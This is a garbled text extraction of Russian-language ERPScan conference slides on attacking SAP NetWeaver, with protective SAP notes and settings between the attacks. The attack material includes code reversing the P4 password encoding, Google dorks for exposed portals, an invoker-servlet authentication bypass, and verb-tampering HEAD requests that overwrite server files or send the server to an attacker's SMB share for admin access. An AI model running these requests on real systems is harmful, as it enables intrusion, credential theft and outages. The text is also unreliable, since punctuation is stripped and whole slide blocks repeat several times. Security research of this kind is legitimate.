Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
